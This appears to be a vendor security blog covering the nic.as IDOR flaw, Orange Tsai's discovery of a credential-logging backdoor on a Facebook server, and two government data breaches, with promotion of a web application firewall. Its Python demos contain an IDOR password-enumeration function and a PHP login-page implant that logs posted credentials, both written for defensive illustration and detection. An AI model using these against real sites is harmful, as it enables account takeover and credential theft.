Application Security News Updates


Flaw Allowed Anyone To Modify & Take Control Over Any .As Domain

A major vulnerability has been disclosed in the website of the American Samoa domain registrar (nic.as).

The vulnerability allowed anyone to view the entire domain record for any .as domain, including the plain-text passwords of the domain owner and of the administrative and technical contacts.

The root cause was an Insecure Direct Object Reference (IDOR), one of the vulnerability classes in the OWASP Top 10: the application used a client-supplied identifier to fetch a record without checking that the requester was authorized to see that record.

The exploit is an example of how an insecure coding practice exposes a site to a very basic attack:

By simply Base64-encoding a .as domain name and appending it to a URL on the nic.as website, it was possible to view the entire domain record for that domain (including the unencrypted passwords for the domain owner, technical contact, and billing contact).

Base64 encoding is often used to obfuscate text, but it is trivially reversible: it is an encoding, not encryption, and it provides neither confidentiality nor access control. An identifier that any client can construct must be backed by a server-side authorization check, or it is effectively public.

In this case, any website registered under .as could have been taken over by anyone who could spell its name, leading to a potentially massive loss of business for the owner.
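The lookup described above, as an added example that is not nic.as code: the legacy handler treats the Base64-encoded domain name as the only key, so anyone who can spell a domain gets its record and passwords, while the hardened handler beside it keeps the same URL parameter but enforces ownership, validates the id, and stops storing plain-text passwords. The registry contents, the `session_user` parameter and the function names are assumptions made for the demo.

```python
import base64
import binascii
import hashlib
import hmac
import os
from typing import Dict, List, Optional

# Constructed sample registry for the demo (assumption: not nic.as data).
# The legacy record keeps contact passwords in plain text, as the article describes.
REGISTRY = {
    "example.as": {"owner": "alice", "owner_password": "hunter2",
                   "tech_contact": "tech@example.as", "tech_password": "pa55word"},
    "other.as":   {"owner": "bob", "owner_password": "s3cret",
                   "tech_contact": "bob@other.as", "tech_password": "letmein"},
}


def encode_id(domain: str) -> str:
    """Build the 'obfuscated' URL parameter: plain Base64 of the domain name."""
    return base64.b64encode(domain.encode()).decode()


def vulnerable_lookup(encoded_domain: str) -> Optional[dict]:
    """Legacy behaviour (IDOR): the URL parameter is the only key. Base64 is an
    encoding, not a secret, so the whole record, passwords included, is served
    to whoever asks. Nothing checks who is asking."""
    domain = base64.b64decode(encoded_domain).decode()
    return REGISTRY.get(domain)


def attacker_dump(domains: List[str]) -> Dict[str, str]:
    """What an attacker does with the IDOR: walk a list of .as names and
    collect the owner password from each record that exists."""
    found = {}
    for d in domains:
        rec = vulnerable_lookup(encode_id(d))
        if rec:
            found[d] = rec["owner_password"]
    return found


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Store a salted PBKDF2-SHA256 hash instead of the plain-text password."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return salt.hex() + "$" + digest.hex()


def verify_password(password: str, stored: str) -> bool:
    """Constant-time comparison against the stored salted hash."""
    salt_hex, digest_hex = stored.split("$", 1)
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                    bytes.fromhex(salt_hex), 200_000)
    return hmac.compare_digest(candidate.hex(), digest_hex)


def hardened_lookup(encoded_domain: str, session_user: Optional[str]) -> Optional[dict]:
    """Fixed behaviour: same URL parameter, but (1) require an authenticated
    session, (2) reject malformed ids, (3) serve the record only to its owner,
    (4) never return password fields. Unknown and forbidden both return None
    so the endpoint cannot be used to confirm which records exist."""
    if session_user is None:
        return None
    try:
        domain = base64.b64decode(encoded_domain, validate=True).decode()
    except (binascii.Error, UnicodeDecodeError):
        return None
    record = REGISTRY.get(domain)
    if record is None or record["owner"] != session_user:
        return None
    return {k: v for k, v in record.items() if not k.endswith("_password")}


if __name__ == "__main__":
    print("IDOR dump:", attacker_dump(["example.as", "other.as"]))
    print("owner view:", hardened_lookup(encode_id("other.as"), "bob"))
    print("other user:", hardened_lookup(encode_id("other.as"), "alice"))
```

The point of the pair is that the URL parameter never changes: encrypting or encoding it differently does not fix the bug; only the ownership check in `hardened_lookup` does, and hashing the stored passwords limits the damage of the next disclosure.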

Whilst you may not be all that familiar with the .as domain, its use is far-reaching. Here are some examples of .as domain owners:

  • Recognizable global brands such as Adidas (a.did.as), Bose (bose.as), Flickr (flickr.as), McDonald’s Australia (macc.as), Opera (oper.as), Twitter (twitter.as), to name but a few all hold .as domains.
  • Large educational establishments such as the University of Texas (utex.as)
  • American Samoa government institutions including the Department of Commerce (doc.as), and the Office of the Governor (gov.as)
  • Link shortening services (such as cbi.as, cort.as and trk.as)
  • Other big businesses/brands that use a .as domain as part of a "domain hack", i.e. to spell out the business or brand name, for example British Gas (britishg.as)

This site was developed over 16 years ago. Legacy web applications like this often carry many such vulnerabilities. Fixing the issues is necessary, but it is frequently complex and time consuming, and it is like trying to hit a moving target. A much easier way to gain protection in the meantime is to deploy the Barracuda Web Application Firewall, which protects against a broad range of web application threats. Its URL encryption feature ensures that the identifiers in your URLs are genuinely opaque to clients and cannot be decoded or tampered with, rather than merely obfuscated. It is a compensating control: the application should still be fixed to check, server-side, that the requester is authorized for the record it asks for.

This whitepaper (PDF) provides more information on the top 10 web threats and how the Barracuda Web Application Firewall can help you secure against them.

How I Hacked Facebook, and Found Someone's Backdoor Script

Orange Tsai, a student at National Taiwan University of Science and Technology, has been pentesting and participating in bug bounties for years. While pursuing Facebook's bug bounty program, Orange found a site that Facebook publishes for its internal users. Once he started testing, he discovered that Facebook was using third-party software. From his article on the incident:

After a simple review, I thought Rapid7 should have already got the easier vulnerabilities. T^T

And the vulnerabilities which needed to be triggered were not easy to exploit. Therefore I needed to look deeper!

Finally, I found 7 vulnerabilities, including

  • Cross-Site Scripting x 3
  • Pre-Auth SQL Injection leads to Remote Code Execution
  • Known-Secret-Key leads to Remote Code Execution
  • Local Privilege Escalation x 2

Being the curious type, Tsai dug in further and found startling evidence: an earlier attacker had already compromised the system and was capturing the credentials of everyone who logged into it.

A brief summary: the hacker created a proxy on the credential page to log the credentials of Facebook employees. These logged passwords were stored under the web directory for the hacker to WGET every once in a while.

This episode had a happy ending: the vulnerabilities were disclosed to Facebook and to the third-party software vendor and were fixed. Tsai received a $10,000 bounty award for his work.

It is common for websites to use third-party software, such as WordPress, Drupal, or proprietary products. This episode highlights the importance of securing web applications and keeping third-party software patched. Administrators need to spend significant time tracking vulnerabilities and applying patches to avoid such breaches. Even then, as in this case, previously unknown vulnerabilities may already be under exploitation, so monitoring the deployed application for signs of compromise matters as much as patching it.
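The backdoor Tsai describes left two traces that patching alone would never catch: a modified login page and a new credential log sitting in the web root. An integrity check of the web directory against a known-good baseline flags both. The following is an added example, not Facebook's, Tsai's, or the vendor's code; the file names, the PHP snippet standing in for the credential-logging proxy, and the harvested line are all constructed for the demo.

```python
import hashlib
import os
import tempfile
from typing import Dict, List


def hash_tree(root: str) -> Dict[str, str]:
    """Manifest of a deployment: relative path -> SHA-256 of every file under root."""
    manifest: Dict[str, str] = {}
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            h = hashlib.sha256()
            with open(path, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    h.update(chunk)
            manifest[os.path.relpath(path, root)] = h.hexdigest()
    return manifest


def diff_manifests(baseline: Dict[str, str],
                   current: Dict[str, str]) -> Dict[str, List[str]]:
    """Everything added, removed or modified since the known-good baseline.
    On a web root that is only changed by deployments, any entry here is
    either a deployment you did not make or an implant."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline
                           if p in current and baseline[p] != current[p]),
    }


def _write(root: str, rel: str, text: str) -> None:
    with open(os.path.join(root, rel), "w") as fh:
        fh.write(text)


def demo() -> Dict[str, List[str]]:
    """Constructed scenario (assumption: a stand-in for the real incident).
    A clean deployment is baselined, then the login page is altered to copy
    submitted credentials into a file inside the web root, as the backdoor
    Tsai found did. The integrity diff flags the edited page and the new file."""
    with tempfile.TemporaryDirectory() as root:
        _write(root, "index.php", "<?php echo 'portal'; ?>\n")
        _write(root, "login.php", "<?php /* original login form */ ?>\n")
        baseline = hash_tree(root)  # taken right after a trusted deployment

        # Attacker step (constructed): proxy the login and log what is posted.
        _write(root, "login.php",
               "<?php file_put_contents('creds.log', "
               "$_POST['user'].':'.$_POST['pass'].\"\\n\", FILE_APPEND);\n"
               "/* original login form */ ?>\n")
        _write(root, "creds.log", "alice:hunter2\n")  # constructed harvested credentials
        return diff_manifests(baseline, hash_tree(root))


if __name__ == "__main__":
    print(demo())
```

In production the baseline is taken from the deployment artifact, stored off the host, and compared on a schedule; an added file with credential-like contents, or a modified authentication page outside a deployment window, is the alert to act on.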

Or, you could protect your sites with the Barracuda Web Application Firewall, which provides web application security against a broad range of web application attacks and is easy to deploy and simple to configure and maintain. And now, with the Barracuda Vulnerability Manager, it is even simpler.


The Barracuda Vulnerability Manager scans your web applications and finds vulnerabilities in them. The report can then be imported into the Barracuda Web Application Firewall to automatically tune its rules to the findings.

Data breaches of Government websites in the Philippines and Turkey put millions at risk of identity theft and more

On March 27th, the website of the Commission on Elections (COMELEC) of the Philippines was breached. The breach was first noticed through a defacement of the site's home page; Anonymous Philippines claimed responsibility. The leaked database held over 75.3 million entries from the electoral register, 54.28 million of them valid voter records, making this breach larger than the 2015 OPM breach.

In another breach, a database containing the personal information of 49 million people from the Turkish citizenship database was posted online.

… the unnamed hacktivist has uploaded a trove of details in a 6.6GB file that claims to hold the first and last names, national identifier numbers, mother's and father's first names, gender, city of birth, date of birth, full address, ID registration cities and districts of 49,611,709 Turkish citizens.

Breaches of PII (personally identifiable information) always have a lasting impact on the individuals whose information is leaked. When the source is a government or healthcare site, the impact is orders of magnitude higher: the data has already been validated as complete and accurate, and that completeness lets malicious actors mount more targeted attacks, from identity theft to convincing phishing, with a better chance of success.

The Barracuda Web Application Firewall can be deployed and configured to secure your website with minimal effort. It provides protection against a broad range of web attacks, and its built-in Data Loss Prevention features help you prevent the leakage of sensitive data through your website.

The Barracuda Web Application Firewall provides security and DDoS protection against automated and targeted attacks. We offer several deployment options, including physical and virtual appliances, and Azure, AWS, and vCloud Air. Try it in your environment for 30 days, risk-free.


Tushar Richabadas is a Product Manager for the Barracuda Web Application Firewall team in our India office.  You can connect with him on LinkedIn here.

